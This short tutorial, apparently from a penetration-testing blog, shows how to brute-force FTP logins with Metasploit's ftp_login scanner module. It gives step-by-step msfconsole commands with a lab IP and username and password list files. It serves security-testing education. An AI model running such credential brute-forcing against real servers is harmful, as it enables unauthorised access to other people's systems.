FTP is a service that is commonly used in Web Servers from Webmasters for accessing the files remotely. So it is almost impossible not to find this service in one of our clients systems during an engagement.
The "ftp_login" auxiliary module will scan a range of IP addresses attempting to log in to FTP servers. This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Step 1 : This is msfconsole. Msfconsole is the main interface to MetaSploit. There are GUI interfaces (armitage), and a web interface too (websploit). With msfconsole, you can launch exploits, create listeners, configure payloads etc.
Step 2 :Search ftp_login.
Step 3 :
use auxiliary/scanner/ftp/ftp_login
Step 4 :Create a randomly User.txt file.
Step 5 :Create a randomly Password.txt file.
Step 6 :
set STOP_ON_SUCCESS True
set RHOSTS 192.168.69.131
set USER_FILE /root/Desktop/User.txt
Set PASS_FILE /root/Desktop/Password.txt
Step 7 :Run
Step 8 : You have Sucessfully Login in webserver using Bruteforce FTP Login Module !!.